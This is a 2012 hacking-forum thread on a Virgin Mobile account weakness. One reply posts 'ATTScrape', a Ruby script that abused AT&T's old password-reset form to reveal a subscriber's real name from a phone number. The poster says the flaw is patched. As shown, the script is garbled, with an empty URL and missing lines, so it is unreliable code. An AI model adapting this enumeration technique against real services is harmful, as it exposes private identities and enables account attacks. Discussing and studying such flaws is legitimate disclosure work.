Six million Virgin Mobile accounts vulnerable

General technological topics without their own forum go here

Six million Virgin Mobile accounts vulnerable

Post by limdis on Mon Sep 17, 2012 10:15 pm
([msg=69434]see Six million Virgin Mobile accounts vulnerable[/msg])

"The quieter you become, the more you are able to hear..."
"Drink all the booze, hack all the things."
User avatar
Posts: 1657
Joined: Mon Jun 28, 2010 5:45 pm
Blog: View Blog (0)

Re: Six million Virgin Mobile accounts vulnerable

Post by NoviceBlackout on Tue Sep 18, 2012 2:34 am
([msg=69436]see Re: Six million Virgin Mobile accounts vulnerable[/msg])

limdis wrote:

That's just embarrassing on Vrigin's behalf.
I noticed in one of the comments that Virgin recommend somebody's birthday for the 6 digit code.
How stupid could one company be!
User avatar
New User
New User
Posts: 46
Joined: Sat Sep 08, 2012 10:50 am
Blog: View Blog (0)

Reminds me of AT&T's system from yesteryear

Post by weekend hacker on Tue Sep 18, 2012 10:30 am
([msg=69442]see Reminds me of AT&T's system from yesteryear[/msg])

This kind of stuff reminds me of the AT&T privacy vuln that was finally closed last year when some media places started to report on it.
If you knew the number, and wanted to "reset the password" it would show your real name and asked if this was you... then you could proceed with the password reset.

So anyone who knew the phone number could find out what that persons real name was. Some silly anons ware not so anon after that..
It was patched some ware in 2011, the guy who initially discovered this and showed me the code did so in november 2010.
So this was just months after Goatse security found a vuln "that could allow anyone to uncover email addresses belonging to customers of AT&T 3G service for the Apple iPad.".
Only he didn't decide to tell gawker about it and it remained there for almost exactly a year(thats what made me remember, the strangeness that it was disclosed after almost exactly 1 year)
I'll include the automated version in this post because its patched now anyway and gives credit where credit is due.

Code: Select all
# ATTScrape
# An exploit-driven reverse lookup on at&t wireless subscribers
# Exploit found and written by Lord 0xF

require 'rubygems'
require 'mechanize'

number = ARGV[0]

def do_magic(number)
  mech =
  # go to page 1
  mech.get('') do |page|
    # submit the number and form stuff and go on to page 2
    page_step1 = page.form_with(:name => 'forgotPasswordActionForm') do |f|
      f.forgotPasswordActionEvent = 'forgotPasswordStep2'
      f.reportActionEvent = 'A_FPWD_FORGOT_PASS_IN_PROGRESS_SUB'
      f.uverseon = 'true'
      f.wirelineon = 'false'
      f.ctnOrMemberId = number
    # make sure subscriber exists
    if page_step1.body.include? 'FP201'
      @error = 'NO SUBSCRIBER'
      return false
    # parse page 2
    @name = page_step1.body.scan(/\'AccountOwnerName\'\,\'([^<>]*)\'\)/imu).flatten.to_s.split('  ').join(' ')
    # if we still don't have it, keep going
    if @name == '' then
       page_step2 = page_step1.form_with(:name => 'forgotPasswordActionForm') do |f| = '10000'
         f.ssn = '9999'
       @name = page_step2.body.scan(/\'AccountOwnerName\'\,\'([^<>]*)\'\)/imu).flatten
     # if its still not here, the record doesn't exist
     if @name == '' then
       @error = 'NO RECORD'
       return false

if do_magic(number) != false then
  puts @name
  puts @error

So maybe after virgin patches this, it'll be worth taking another look to see if they did it right?

EDIT: Somehow I can't find the report about this anywhere anymore. :s
<Yoda> if someone says something i don't like, i ban him, ban whoever defends him, and then ban the witnesses...
User avatar
weekend hacker
Posts: 193
Joined: Sun Apr 13, 2008 2:39 pm
Blog: View Blog (0)

Return to General

Who is online

Users browsing this forum: No registered users and 0 guests